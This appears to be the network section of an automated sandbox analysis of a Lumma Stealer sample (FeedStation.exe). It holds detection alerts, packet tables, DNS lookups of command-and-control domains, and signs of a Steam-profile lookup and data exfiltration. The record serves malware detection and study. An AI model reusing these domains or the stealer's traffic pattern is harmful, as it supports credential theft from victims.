2025-01-10T11:59:13.456229+0100	2058222	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz)	1	192.168.2.5	57899	1.1.1.1	53	UDP
2025-01-10T11:59:13.469485+0100	2058214	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz)	1	192.168.2.5	62590	1.1.1.1	53	UDP
2025-01-10T11:59:13.481736+0100	2058220	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz)	1	192.168.2.5	53630	1.1.1.1	53	UDP
2025-01-10T11:59:13.500882+0100	2058218	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz)	1	192.168.2.5	50214	1.1.1.1	53	UDP
2025-01-10T11:59:13.513175+0100	2058216	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz)	1	192.168.2.5	61287	1.1.1.1	53	UDP
2025-01-10T11:59:13.537250+0100	2058236	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou)	1	192.168.2.5	52814	1.1.1.1	53	UDP
2025-01-10T11:59:13.548954+0100	2058210	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou)	1	192.168.2.5	58915	1.1.1.1	53	UDP
2025-01-10T11:59:13.581219+0100	2058226	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou)	1	192.168.2.5	52281	1.1.1.1	53	UDP
2025-01-10T11:59:14.264393+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49773	104.102.49.254	443	TCP
2025-01-10T11:59:14.766792+0100	2858666	ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup	1	192.168.2.5	49773	104.102.49.254	443	TCP
2025-01-10T11:59:15.392088+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49783	104.21.112.1	443	TCP
2025-01-10T11:59:15.822982+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49783	104.21.112.1	443	TCP
2025-01-10T11:59:15.822982+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49783	104.21.112.1	443	TCP
2025-01-10T11:59:16.390068+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49791	104.21.112.1	443	TCP
2025-01-10T11:59:16.846895+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.5	49791	104.21.112.1	443	TCP
2025-01-10T11:59:16.846895+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49791	104.21.112.1	443	TCP
2025-01-10T11:59:17.577909+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49801	104.21.112.1	443	TCP
2025-01-10T11:59:18.100326+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.5	49801	104.21.112.1	443	TCP
2025-01-10T11:59:18.757926+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49807	104.21.112.1	443	TCP
2025-01-10T11:59:20.346697+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49819	104.21.112.1	443	TCP
2025-01-10T11:59:21.716762+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49829	104.21.112.1	443	TCP
2025-01-10T11:59:23.238401+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49840	104.21.112.1	443	TCP
2025-01-10T11:59:24.286958+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49847	104.21.112.1	443	TCP
2025-01-10T11:59:24.807042+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49847	104.21.112.1	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 11:59:13.608906031 CET	49773	443	192.168.2.5	104.102.49.254
Jan 10, 2025 11:59:13.608941078 CET	443	49773	104.102.49.254	192.168.2.5
Jan 10, 2025 11:59:13.609029055 CET	49773	443	192.168.2.5	104.102.49.254
Jan 10, 2025 11:59:13.610285997 CET	49773	443	192.168.2.5	104.102.49.254
Jan 10, 2025 11:59:13.610315084 CET	443	49773	104.102.49.254	192.168.2.5
Jan 10, 2025 11:59:14.264271021 CET	443	49773	104.102.49.254	192.168.2.5
Jan 10, 2025 11:59:14.264393091 CET	49773	443	192.168.2.5	104.102.49.254
Jan 10, 2025 11:59:14.266005039 CET	49773	443	192.168.2.5	104.102.49.254
Jan 10, 2025 11:59:14.266015053 CET	443	49773	104.102.49.254	192.168.2.5
Jan 10, 2025 11:59:14.266273975 CET	443	49773	104.102.49.254	192.168.2.5
Jan 10, 2025 11:59:14.315933943 CET	49773	443	192.168.2.5	104.102.49.254
Jan 10, 2025 11:59:14.359338045 CET	443	49773	104.102.49.254	192.168.2.5
Jan 10, 2025 11:59:14.766803026 CET	443	49773	104.102.49.254	192.168.2.5
Jan 10, 2025 11:59:14.766833067 CET	443	49773	104.102.49.254	192.168.2.5
Jan 10, 2025 11:59:14.766874075 CET	443	49773	104.102.49.254	192.168.2.5
Jan 10, 2025 11:59:14.766896009 CET	443	49773	104.102.49.254	192.168.2.5
Jan 10, 2025 11:59:14.766927004 CET	443	49773	104.102.49.254	192.168.2.5
Jan 10, 2025 11:59:14.766969919 CET	49773	443	192.168.2.5	104.102.49.254
Jan 10, 2025 11:59:14.767000914 CET	443	49773	104.102.49.254	192.168.2.5
Jan 10, 2025 11:59:14.767039061 CET	49773	443	192.168.2.5	104.102.49.254
Jan 10, 2025 11:59:14.767080069 CET	49773	443	192.168.2.5	104.102.49.254
Jan 10, 2025 11:59:14.864027023 CET	443	49773	104.102.49.254	192.168.2.5
Jan 10, 2025 11:59:14.864053011 CET	443	49773	104.102.49.254	192.168.2.5
Jan 10, 2025 11:59:14.864211082 CET	49773	443	192.168.2.5	104.102.49.254
Jan 10, 2025 11:59:14.864242077 CET	443	49773	104.102.49.254	192.168.2.5
Jan 10, 2025 11:59:14.867250919 CET	49773	443	192.168.2.5	104.102.49.254
Jan 10, 2025 11:59:14.869193077 CET	443	49773	104.102.49.254	192.168.2.5
Jan 10, 2025 11:59:14.869324923 CET	49773	443	192.168.2.5	104.102.49.254
Jan 10, 2025 11:59:14.873831034 CET	443	49773	104.102.49.254	192.168.2.5
Jan 10, 2025 11:59:14.873936892 CET	443	49773	104.102.49.254	192.168.2.5
Jan 10, 2025 11:59:14.874039888 CET	49773	443	192.168.2.5	104.102.49.254
Jan 10, 2025 11:59:14.881823063 CET	49773	443	192.168.2.5	104.102.49.254
Jan 10, 2025 11:59:14.881843090 CET	443	49773	104.102.49.254	192.168.2.5
Jan 10, 2025 11:59:14.881856918 CET	49773	443	192.168.2.5	104.102.49.254
Jan 10, 2025 11:59:14.881864071 CET	443	49773	104.102.49.254	192.168.2.5
Jan 10, 2025 11:59:14.911519051 CET	49783	443	192.168.2.5	104.21.112.1
Jan 10, 2025 11:59:14.911567926 CET	443	49783	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:14.911657095 CET	49783	443	192.168.2.5	104.21.112.1
Jan 10, 2025 11:59:14.911933899 CET	49783	443	192.168.2.5	104.21.112.1
Jan 10, 2025 11:59:14.911947966 CET	443	49783	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:15.391973019 CET	443	49783	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:15.392087936 CET	49783	443	192.168.2.5	104.21.112.1
Jan 10, 2025 11:59:15.393769979 CET	49783	443	192.168.2.5	104.21.112.1
Jan 10, 2025 11:59:15.393775940 CET	443	49783	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:15.394074917 CET	443	49783	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:15.395363092 CET	49783	443	192.168.2.5	104.21.112.1
Jan 10, 2025 11:59:15.395380974 CET	49783	443	192.168.2.5	104.21.112.1
Jan 10, 2025 11:59:15.395422935 CET	443	49783	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:15.822985888 CET	443	49783	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:15.823082924 CET	443	49783	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:15.823267937 CET	49783	443	192.168.2.5	104.21.112.1
Jan 10, 2025 11:59:15.823782921 CET	49783	443	192.168.2.5	104.21.112.1
Jan 10, 2025 11:59:15.823796034 CET	443	49783	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:15.823812962 CET	49783	443	192.168.2.5	104.21.112.1
Jan 10, 2025 11:59:15.823817968 CET	443	49783	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:15.933995962 CET	49791	443	192.168.2.5	104.21.112.1
Jan 10, 2025 11:59:15.934027910 CET	443	49791	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:15.934118986 CET	49791	443	192.168.2.5	104.21.112.1
Jan 10, 2025 11:59:15.934429884 CET	49791	443	192.168.2.5	104.21.112.1
Jan 10, 2025 11:59:15.934442043 CET	443	49791	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:16.389986992 CET	443	49791	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:16.390068054 CET	49791	443	192.168.2.5	104.21.112.1
Jan 10, 2025 11:59:16.393112898 CET	49791	443	192.168.2.5	104.21.112.1
Jan 10, 2025 11:59:16.393122911 CET	443	49791	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:16.393330097 CET	443	49791	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:16.394785881 CET	49791	443	192.168.2.5	104.21.112.1
Jan 10, 2025 11:59:16.394813061 CET	49791	443	192.168.2.5	104.21.112.1
Jan 10, 2025 11:59:16.394840002 CET	443	49791	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:16.846941948 CET	443	49791	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:16.847034931 CET	443	49791	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:16.847068071 CET	443	49791	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:16.847100973 CET	443	49791	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:16.847101927 CET	49791	443	192.168.2.5	104.21.112.1
Jan 10, 2025 11:59:16.847121954 CET	443	49791	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:16.847138882 CET	49791	443	192.168.2.5	104.21.112.1
Jan 10, 2025 11:59:16.847198963 CET	443	49791	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:16.847243071 CET	443	49791	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:16.847273111 CET	443	49791	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:16.847285032 CET	49791	443	192.168.2.5	104.21.112.1
Jan 10, 2025 11:59:16.847295046 CET	443	49791	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:16.847318888 CET	49791	443	192.168.2.5	104.21.112.1
Jan 10, 2025 11:59:16.851566076 CET	443	49791	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:16.851596117 CET	443	49791	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:16.851624012 CET	443	49791	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:16.851624012 CET	49791	443	192.168.2.5	104.21.112.1
Jan 10, 2025 11:59:16.851634979 CET	443	49791	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:16.851665974 CET	49791	443	192.168.2.5	104.21.112.1
Jan 10, 2025 11:59:16.898804903 CET	49791	443	192.168.2.5	104.21.112.1
Jan 10, 2025 11:59:16.933521032 CET	443	49791	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:16.933648109 CET	443	49791	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:16.933716059 CET	49791	443	192.168.2.5	104.21.112.1
Jan 10, 2025 11:59:16.933816910 CET	49791	443	192.168.2.5	104.21.112.1
Jan 10, 2025 11:59:16.933835030 CET	443	49791	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:16.933845043 CET	49791	443	192.168.2.5	104.21.112.1
Jan 10, 2025 11:59:16.933851004 CET	443	49791	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:17.100723028 CET	49801	443	192.168.2.5	104.21.112.1
Jan 10, 2025 11:59:17.100734949 CET	443	49801	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:17.100815058 CET	49801	443	192.168.2.5	104.21.112.1
Jan 10, 2025 11:59:17.101193905 CET	49801	443	192.168.2.5	104.21.112.1
Jan 10, 2025 11:59:17.101207018 CET	443	49801	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:17.577766895 CET	443	49801	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:17.577908993 CET	49801	443	192.168.2.5	104.21.112.1
Jan 10, 2025 11:59:17.579106092 CET	49801	443	192.168.2.5	104.21.112.1
Jan 10, 2025 11:59:17.579113960 CET	443	49801	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:17.579349041 CET	443	49801	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:17.580518007 CET	49801	443	192.168.2.5	104.21.112.1
Jan 10, 2025 11:59:17.580677986 CET	49801	443	192.168.2.5	104.21.112.1
Jan 10, 2025 11:59:17.580708027 CET	443	49801	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:18.100332022 CET	443	49801	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:18.100456953 CET	443	49801	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:18.100605965 CET	49801	443	192.168.2.5	104.21.112.1
Jan 10, 2025 11:59:18.100795984 CET	49801	443	192.168.2.5	104.21.112.1
Jan 10, 2025 11:59:18.100816965 CET	443	49801	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:18.276402950 CET	49807	443	192.168.2.5	104.21.112.1
Jan 10, 2025 11:59:18.276446104 CET	443	49807	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:18.276509047 CET	49807	443	192.168.2.5	104.21.112.1
Jan 10, 2025 11:59:18.277415991 CET	49807	443	192.168.2.5	104.21.112.1
Jan 10, 2025 11:59:18.277426004 CET	443	49807	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:18.757775068 CET	443	49807	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:18.757925987 CET	49807	443	192.168.2.5	104.21.112.1
Jan 10, 2025 11:59:18.759665012 CET	49807	443	192.168.2.5	104.21.112.1
Jan 10, 2025 11:59:18.759670019 CET	443	49807	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:18.759979010 CET	443	49807	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:18.761451960 CET	49807	443	192.168.2.5	104.21.112.1
Jan 10, 2025 11:59:18.761650085 CET	49807	443	192.168.2.5	104.21.112.1
Jan 10, 2025 11:59:18.761686087 CET	443	49807	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:18.761745930 CET	49807	443	192.168.2.5	104.21.112.1
Jan 10, 2025 11:59:18.803324938 CET	443	49807	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:19.267585039 CET	443	49807	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:19.267669916 CET	443	49807	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:19.267744064 CET	49807	443	192.168.2.5	104.21.112.1
Jan 10, 2025 11:59:19.322556019 CET	49807	443	192.168.2.5	104.21.112.1
Jan 10, 2025 11:59:19.322578907 CET	443	49807	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:19.867378950 CET	49819	443	192.168.2.5	104.21.112.1
Jan 10, 2025 11:59:19.867424965 CET	443	49819	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:19.867536068 CET	49819	443	192.168.2.5	104.21.112.1
Jan 10, 2025 11:59:19.868002892 CET	49819	443	192.168.2.5	104.21.112.1
Jan 10, 2025 11:59:19.868024111 CET	443	49819	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:20.346498966 CET	443	49819	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:20.346697092 CET	49819	443	192.168.2.5	104.21.112.1
Jan 10, 2025 11:59:20.348054886 CET	49819	443	192.168.2.5	104.21.112.1
Jan 10, 2025 11:59:20.348067045 CET	443	49819	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:20.348340988 CET	443	49819	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:20.349589109 CET	49819	443	192.168.2.5	104.21.112.1
Jan 10, 2025 11:59:20.349733114 CET	49819	443	192.168.2.5	104.21.112.1
Jan 10, 2025 11:59:20.349766016 CET	443	49819	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:20.349973917 CET	49819	443	192.168.2.5	104.21.112.1
Jan 10, 2025 11:59:20.349988937 CET	443	49819	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:20.940834045 CET	443	49819	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:20.940926075 CET	443	49819	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:20.941134930 CET	49819	443	192.168.2.5	104.21.112.1
Jan 10, 2025 11:59:20.941165924 CET	49819	443	192.168.2.5	104.21.112.1
Jan 10, 2025 11:59:20.941180944 CET	443	49819	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:21.256979942 CET	49829	443	192.168.2.5	104.21.112.1
Jan 10, 2025 11:59:21.257028103 CET	443	49829	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:21.257131100 CET	49829	443	192.168.2.5	104.21.112.1
Jan 10, 2025 11:59:21.257525921 CET	49829	443	192.168.2.5	104.21.112.1
Jan 10, 2025 11:59:21.257538080 CET	443	49829	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:21.715971947 CET	443	49829	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:21.716762066 CET	49829	443	192.168.2.5	104.21.112.1
Jan 10, 2025 11:59:21.717382908 CET	49829	443	192.168.2.5	104.21.112.1
Jan 10, 2025 11:59:21.717389107 CET	443	49829	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:21.717618942 CET	443	49829	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:21.719000101 CET	49829	443	192.168.2.5	104.21.112.1
Jan 10, 2025 11:59:21.719000101 CET	49829	443	192.168.2.5	104.21.112.1
Jan 10, 2025 11:59:21.719023943 CET	443	49829	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:22.493932009 CET	443	49829	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:22.494029999 CET	443	49829	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:22.494087934 CET	49829	443	192.168.2.5	104.21.112.1
Jan 10, 2025 11:59:22.495929956 CET	49829	443	192.168.2.5	104.21.112.1
Jan 10, 2025 11:59:22.495945930 CET	443	49829	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:22.762533903 CET	49840	443	192.168.2.5	104.21.112.1
Jan 10, 2025 11:59:22.762578011 CET	443	49840	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:22.762645006 CET	49840	443	192.168.2.5	104.21.112.1
Jan 10, 2025 11:59:22.763283968 CET	49840	443	192.168.2.5	104.21.112.1
Jan 10, 2025 11:59:22.763298988 CET	443	49840	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:23.238323927 CET	443	49840	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:23.238400936 CET	49840	443	192.168.2.5	104.21.112.1
Jan 10, 2025 11:59:23.239970922 CET	49840	443	192.168.2.5	104.21.112.1
Jan 10, 2025 11:59:23.239980936 CET	443	49840	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:23.240230083 CET	443	49840	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:23.242271900 CET	49840	443	192.168.2.5	104.21.112.1
Jan 10, 2025 11:59:23.242378950 CET	49840	443	192.168.2.5	104.21.112.1
Jan 10, 2025 11:59:23.242384911 CET	443	49840	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:23.775135994 CET	443	49840	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:23.775243998 CET	443	49840	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:23.775419950 CET	49840	443	192.168.2.5	104.21.112.1
Jan 10, 2025 11:59:23.775556087 CET	49840	443	192.168.2.5	104.21.112.1
Jan 10, 2025 11:59:23.775571108 CET	443	49840	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:23.804420948 CET	49847	443	192.168.2.5	104.21.112.1
Jan 10, 2025 11:59:23.804454088 CET	443	49847	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:23.804557085 CET	49847	443	192.168.2.5	104.21.112.1
Jan 10, 2025 11:59:23.804908991 CET	49847	443	192.168.2.5	104.21.112.1
Jan 10, 2025 11:59:23.804922104 CET	443	49847	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:24.286714077 CET	443	49847	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:24.286957979 CET	49847	443	192.168.2.5	104.21.112.1
Jan 10, 2025 11:59:24.293687105 CET	49847	443	192.168.2.5	104.21.112.1
Jan 10, 2025 11:59:24.293709993 CET	443	49847	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:24.293955088 CET	443	49847	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:24.295218945 CET	49847	443	192.168.2.5	104.21.112.1
Jan 10, 2025 11:59:24.295283079 CET	49847	443	192.168.2.5	104.21.112.1
Jan 10, 2025 11:59:24.295321941 CET	443	49847	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:24.807015896 CET	443	49847	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:24.807115078 CET	443	49847	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:24.807178974 CET	49847	443	192.168.2.5	104.21.112.1
Jan 10, 2025 11:59:24.807482004 CET	49847	443	192.168.2.5	104.21.112.1
Jan 10, 2025 11:59:24.807502985 CET	443	49847	104.21.112.1	192.168.2.5
Jan 10, 2025 11:59:24.807521105 CET	49847	443	192.168.2.5	104.21.112.1
Jan 10, 2025 11:59:24.807526112 CET	443	49847	104.21.112.1	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 11:59:13.442100048 CET	56548	53	192.168.2.5	1.1.1.1
Jan 10, 2025 11:59:13.452691078 CET	53	56548	1.1.1.1	192.168.2.5
Jan 10, 2025 11:59:13.456228971 CET	57899	53	192.168.2.5	1.1.1.1
Jan 10, 2025 11:59:13.465557098 CET	53	57899	1.1.1.1	192.168.2.5
Jan 10, 2025 11:59:13.469485044 CET	62590	53	192.168.2.5	1.1.1.1
Jan 10, 2025 11:59:13.479367018 CET	53	62590	1.1.1.1	192.168.2.5
Jan 10, 2025 11:59:13.481735945 CET	53630	53	192.168.2.5	1.1.1.1
Jan 10, 2025 11:59:13.495337009 CET	53	53630	1.1.1.1	192.168.2.5
Jan 10, 2025 11:59:13.500881910 CET	50214	53	192.168.2.5	1.1.1.1
Jan 10, 2025 11:59:13.510917902 CET	53	50214	1.1.1.1	192.168.2.5
Jan 10, 2025 11:59:13.513175011 CET	61287	53	192.168.2.5	1.1.1.1
Jan 10, 2025 11:59:13.531842947 CET	53	61287	1.1.1.1	192.168.2.5
Jan 10, 2025 11:59:13.537250042 CET	52814	53	192.168.2.5	1.1.1.1
Jan 10, 2025 11:59:13.546886921 CET	53	52814	1.1.1.1	192.168.2.5
Jan 10, 2025 11:59:13.548954010 CET	58915	53	192.168.2.5	1.1.1.1
Jan 10, 2025 11:59:13.578705072 CET	53	58915	1.1.1.1	192.168.2.5
Jan 10, 2025 11:59:13.581218958 CET	52281	53	192.168.2.5	1.1.1.1
Jan 10, 2025 11:59:13.591371059 CET	53	52281	1.1.1.1	192.168.2.5
Jan 10, 2025 11:59:13.594044924 CET	52997	53	192.168.2.5	1.1.1.1
Jan 10, 2025 11:59:13.603363037 CET	53	52997	1.1.1.1	192.168.2.5
Jan 10, 2025 11:59:14.900018930 CET	58893	53	192.168.2.5	1.1.1.1
Jan 10, 2025 11:59:14.907584906 CET	53	58893	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 10, 2025 11:59:13.442100048 CET	192.168.2.5	1.1.1.1	0x7c2	Standard query (0)	ingreem-eilish.biz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 11:59:13.456228971 CET	192.168.2.5	1.1.1.1	0xc5f7	Standard query (0)	immureprech.biz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 11:59:13.469485044 CET	192.168.2.5	1.1.1.1	0x94c5	Standard query (0)	deafeninggeh.biz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 11:59:13.481735945 CET	192.168.2.5	1.1.1.1	0xfeb5	Standard query (0)	effecterectz.xyz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 11:59:13.500881910 CET	192.168.2.5	1.1.1.1	0x2176	Standard query (0)	diffuculttan.xyz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 11:59:13.513175011 CET	192.168.2.5	1.1.1.1	0xebf3	Standard query (0)	debonairnukk.xyz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 11:59:13.537250042 CET	192.168.2.5	1.1.1.1	0x19d6	Standard query (0)	wrathful-jammy.cyou	A (IP address)	IN (0x0001)	false
Jan 10, 2025 11:59:13.548954010 CET	192.168.2.5	1.1.1.1	0xac92	Standard query (0)	awake-weaves.cyou	A (IP address)	IN (0x0001)	false
Jan 10, 2025 11:59:13.581218958 CET	192.168.2.5	1.1.1.1	0xc43a	Standard query (0)	sordid-snaked.cyou	A (IP address)	IN (0x0001)	false
Jan 10, 2025 11:59:13.594044924 CET	192.168.2.5	1.1.1.1	0x316d	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Jan 10, 2025 11:59:14.900018930 CET	192.168.2.5	1.1.1.1	0x5376	Standard query (0)	sputnik-1985.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 10, 2025 11:59:13.452691078 CET	1.1.1.1	192.168.2.5	0x7c2	Name error (3)	ingreem-eilish.biz	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2025 11:59:13.465557098 CET	1.1.1.1	192.168.2.5	0xc5f7	Name error (3)	immureprech.biz	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2025 11:59:13.479367018 CET	1.1.1.1	192.168.2.5	0x94c5	Name error (3)	deafeninggeh.biz	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2025 11:59:13.495337009 CET	1.1.1.1	192.168.2.5	0xfeb5	Name error (3)	effecterectz.xyz	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2025 11:59:13.510917902 CET	1.1.1.1	192.168.2.5	0x2176	Name error (3)	diffuculttan.xyz	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2025 11:59:13.531842947 CET	1.1.1.1	192.168.2.5	0xebf3	Name error (3)	debonairnukk.xyz	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2025 11:59:13.546886921 CET	1.1.1.1	192.168.2.5	0x19d6	Name error (3)	wrathful-jammy.cyou	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2025 11:59:13.578705072 CET	1.1.1.1	192.168.2.5	0xac92	Name error (3)	awake-weaves.cyou	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2025 11:59:13.591371059 CET	1.1.1.1	192.168.2.5	0xc43a	Name error (3)	sordid-snaked.cyou	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2025 11:59:13.603363037 CET	1.1.1.1	192.168.2.5	0x316d	No error (0)	steamcommunity.com		104.102.49.254	A (IP address)	IN (0x0001)	false
Jan 10, 2025 11:59:14.907584906 CET	1.1.1.1	192.168.2.5	0x5376	No error (0)	sputnik-1985.com		104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 11:59:14.907584906 CET	1.1.1.1	192.168.2.5	0x5376	No error (0)	sputnik-1985.com		104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 11:59:14.907584906 CET	1.1.1.1	192.168.2.5	0x5376	No error (0)	sputnik-1985.com		104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 11:59:14.907584906 CET	1.1.1.1	192.168.2.5	0x5376	No error (0)	sputnik-1985.com		104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 11:59:14.907584906 CET	1.1.1.1	192.168.2.5	0x5376	No error (0)	sputnik-1985.com		104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 11:59:14.907584906 CET	1.1.1.1	192.168.2.5	0x5376	No error (0)	sputnik-1985.com		104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 11:59:14.907584906 CET	1.1.1.1	192.168.2.5	0x5376	No error (0)	sputnik-1985.com		104.21.80.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

steamcommunity.com

sputnik-1985.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49773	104.102.49.254	443	6416	C:\Users\user\Desktop\FeedStation.exe

Timestamp	Bytes transferred	Direction	Data
